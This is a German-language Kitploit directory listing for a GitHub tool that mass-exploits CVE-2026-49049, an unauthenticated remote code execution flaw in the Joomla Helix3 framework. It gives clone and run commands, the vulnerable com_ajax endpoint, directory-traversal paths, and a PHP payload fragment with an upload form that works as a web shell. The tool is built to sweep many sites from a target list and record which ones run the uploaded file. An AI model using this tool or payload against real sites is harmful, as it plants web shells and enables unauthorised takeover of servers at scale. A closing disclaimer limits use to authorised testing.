Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/jenderal92/cve-2026-49049
SchwachstellenscannerWeb-SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubjenderal92/cve-2026-49049

CVE-2026-49049

Massenscanner für Joomla Helix3 CVE-2026-49049, der PHP-Test-Payloads über com_ajax hochlädt und ausgeführte (RCE) oder rohe PHP-Antworten erkennt.

Repository anzeigen
vor 18 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-49049 Massen-Scanner

Massen-Schwachstellenscanner für CVE-2026-49049 – Nicht authentifizierte Remote-Codeausführung im Joomla-Helix3-Framework.


📌 Beschreibung

Dieses Tool prüft mehrere Joomla-Websites auf die CVE-2026-49049-Schwachstelle im Helix3-Plugin. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebigen PHP-Code auf dem Zielserver hochzuladen und auszuführen.

Der Scanner versucht Folgendes:

  1. Den com_ajax-Endpunkt mit dem helix3-Plugin auszunutzen.
  2. Eine harmlose PHP-Info-/Payload-Datei hochzuladen.
  3. Zu erkennen, ob die Datei ausgeführt oder nur als roher PHP-Code gespeichert wird.

⚡ Funktionen

  • Massen-Scanning mit Multithreading (standardmäßig 20 Threads).
  • Zwei Erkennungsmodi:
    • ✅ Verwundbar – PHP-Code wird ausgeführt (erfolgreiche RCE).
    • ⚠️ Roher PHP-Code – Datei wird hochgeladen, aber nicht ausgeführt (Code-Offenlegung).
  • Automatische Payload-Erzeugung mit zufälligen Dateinamen.
  • Ausgabe wird zur weiteren Analyse in separate Dateien gespeichert.
  • Leichtgewichtig und schnell mit Timeout-Behandlung.

📦 Voraussetzungen

  • Python 2.7
  • requests-Bibliothek
root@kitploit:~
pip install requests

🛠 Installation

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py

🚀 Verwendung

root@kitploit:~
python2 cve-2026-49049.py targets.txt

Eingabeformat

Jede Zeile in targets.txt sollte eine Domain oder IP enthalten:

root@kitploit:~
example.com
https://example.com
http://192.168.1.100

Ausgabedateien

Datei Beschreibung results.txt Verwundbare URLs, bei denen die Payload ausgeführt wurde rez.txt URLs, bei denen die Payload hochgeladen, aber nicht ausgeführt wurde (roher PHP-Code)


Beispielausgabe

root@kitploit:~
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================

[*] Loaded 150 targets
[*] Using 20 threads

[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com

============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5

[+] Vulnerable URLs:
    https://target.com/tmp_123456.php.json

⚙️ Konfiguration

Sie können die folgenden Variablen im Skript anpassen:

Variable Standard Beschreibung THREADS 20 Anzahl der gleichzeitigen Threads PATHS ['../../../', '../../../../'] Verzeichnis-Traversal-Pfade TIMEOUT 5 HTTP-Request-Timeout RESULT_FILE 'results.txt' Ausgabedatei für verwundbare Websites RAW_RESULT_FILE 'rez.txt' Ausgabedatei für Websites mit rohem PHP-Code


🧠 So funktioniert es

Das Skript sendet eine POST-Anfrage an:

root@kitploit:~
/index.php?option=com_ajax&plugin=helix3&format=json

mit einer Payload, die:

  1. Einen Verzeichnis-Traversal-Pfad angibt (z. B. ../../../)
  2. Eine PHP-Datei mit zufälligem Namen hochlädt
  3. Eine einfache Web-Shell-/Infoseite enthält

Anschließend prüft es, ob die Datei erreichbar ist und ob der PHP-Code ausgeführt oder nur als Klartext angezeigt wird.

Payload-Beispiel

root@kitploit:~
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und autorisierten Testzwecken.

Die unbefugte Verwendung dieses Tools gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testberechtigung haben, ist illegal. Der Autor ist nicht für Missbrauch oder Schäden verantwortlich, die durch dieses Tool verursacht werden.

Weitere Haftungsausschlüsse: Sie können den Haftungsausschluss auf der Titelseite von Jenderal92 einsehen. Sie können ihn HIER !!! überprüfen.


Tool herunterladen